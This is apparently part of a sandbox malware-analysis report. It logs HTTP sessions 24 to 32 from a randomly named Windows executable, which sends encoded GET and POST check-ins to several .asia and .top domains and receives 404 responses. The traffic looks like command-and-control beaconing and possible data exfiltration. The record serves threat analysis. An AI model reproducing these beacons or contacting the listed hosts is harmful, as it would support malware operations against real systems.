                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49992 | 149.88.81.190 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:20.484267950 CET | 495 | OUT | GET /hkgx/?wzcP=iLdd&bV=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvS5L8ubcdexDHAV6gjjxkBAdNrGiSX2pXpBWFAYYwVQiPg== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.xcvbj.asia
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:25:22.080389977 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:25:21 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50001 | 101.35.209.183 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:28.108784914 CET | 762 | OUT | POST /31pt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.yc791022.asia
Origin: http://www.yc791022.asia
Referer: http://www.yc791022.asia/31pt/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 72 4c 65 45 4e 51 4b 44 4c 54 47 53 71 45 46 42 2b 6e 49 71 4d 50 54 65 38 67 53 4d 68 5a 79 66 63 4b 43 52 57 39 49 3d
                                                                                                                  Data Ascii: bV=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefrLeENQKDLTGSqEFB+nIqMPTe8gSMhZyfcKCRW9I=
Dec 2, 2024 15:25:29.637854099 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 14:25:29 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50002 | 101.35.209.183 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:30.773058891 CET | 782 | OUT | POST /31pt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.yc791022.asia
Origin: http://www.yc791022.asia
Referer: http://www.yc791022.asia/31pt/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 2f 6d 73 7a 61 37 77 70 54 32 47 70 53 68 49 71 63 4e 78 37 31 45 2b 61 66 6d 4c 52 66 69 53 4c 68 4a 48 67 69 74
                                                                                                                  Data Ascii: bV=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfv/msza7wpT2GpShIqcNx71E+afmLRfiSLhJHgit
Dec 2, 2024 15:25:32.335412979 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 14:25:32 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50003 | 101.35.209.183 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:33.440824032 CET | 1799 | OUT | POST /31pt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.yc791022.asia
Origin: http://www.yc791022.asia
Referer: http://www.yc791022.asia/31pt/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 7a 32 34 30 7a 55 39 6d 31 38 6f 64 75 58 4a 6e 68 2b 75 77 70 66 59 50 2f 43 41 53 35 6c 74 31 6f 70 32 78 75 6e 6c 42 69 61 77 4e 76 38 65 48 56 79 74 49 75 46 76 69 74 4b 4b 44 35 50 4f 2f 7a 7a 6c 62 57 74 62 64 49 76 74 62 59 75 43 4e 57 38 75 54 59 32 63 54 62 6f 57 6f 6c 73 73 71 79 76 36 42 58 39 6a 55 75 68 6b 4d 75 62 74 67 6f 37 4e 66 75 74 75 65 38 55 77 77 4b 42 6b 76 6c 6f 6e 6e 77 65 2b 76 75 4c 51 34 69 42 30 65 37 4f 70 6c 33 4b 51 39 6b 37 51 33 61 69 76 63 49 55 53 54 35 50 [TRUNCATED]
Data Ascii: bV= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50004 | 101.35.209.183 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:36.112504959 CET | 498 | OUT | GET /31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.yc791022.asia
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:25:37.654850960 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 14:25:37 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50005 | Destination IP: 38.47.232.202 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:25:43.352871895 CET | Bytes transferred: 750 | Direction: OUT
Data:
POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 36 34 57 2b 50 75 67 58 50 48 30 41 77 44 68 4d 4d 65 6c 71 6b 58 73 57 64 4d 42 2b 4a 61 59 6f 79 58 69 67 66 73 73 3d
Data Ascii: bV=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA64W+PugXPH0AwDhMMelqkXsWdMB+JaYoyXigfss=

Timestamp: Dec 2, 2024 15:25:44.873356104 CET | Bytes transferred: 312 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:25:44 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66df9b06-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50006 | Destination IP: 38.47.232.202 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:25:46.024542093 CET | Bytes transferred: 770 | Direction: OUT
Data:
POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 41 75 4e 66 4a 4a 59 71 35 42 6f 30 79 51 42 37 37 71 74 79 65 2b 42 65 41 69 58 45 32 6e 39 57 67 2b 59 62 75 49
Data Ascii: bV=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33AuNfJJYq5Bo0yQB77qtye+BeAiXE2n9Wg+YbuI

Timestamp: Dec 2, 2024 15:25:47.656086922 CET | Bytes transferred: 312 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:25:47 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66df9b06-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 50007 | Destination IP: 38.47.232.202 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:25:48.694571018 CET | Bytes transferred: 1787 | Direction: OUT
Data:
POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 59 4e 70 6a 74 4b 47 39 45 55 6a 30 59 57 47 59 4a 7a 47 65 6c 76 6c 55 79 45 44 4a 62 37 78 52 61 44 4c 50 51 30 66 47 58 35 70 54 6b 71 66 62 2f 43 4a 4f 45 37 64 46 44 67 42 6f 51 67 61 79 57 31 79 79 2f 7a 62 73 58 55 6b 50 6c 59 51 5a 59 39 36 7a 4d 32 65 79 6d 7a 45 42 7a 35 50 30 55 52 42 75 43 5a 63 2f 4a 55 4c 56 72 2b 43 6a 75 37 4a 49 68 37 54 42 53 39 4d 34 6f 30 6f 4f 67 54 34 5a 51 63 2f 7a 46 39 6d 74 55 6b 2b 41 30 59 47 75 57 47 59 41 6d 70 2b 55 49 73 6d 6b 36 6c 61 4d 47 [TRUNCATED]
Data Ascii: bV=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUYNpjtKG9EUj0YWGYJzGelvlUyEDJb7xRaDLPQ0fGX5pTkqfb/CJOE7dFDgBoQgayW1yy/zbsXUkPlYQZY96zM2eymzEBz5P0URBuCZc/JULVr+Cju7JIh7TBS9M4o0oOgT4ZQc/zF9mtUk+A0YGuWGYAmp+UIsmk6laMG [TRUNCATED]


Session ID: 32 | Source IP: 192.168.2.5 | Source Port: 50008 | Destination IP: 38.47.232.202 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

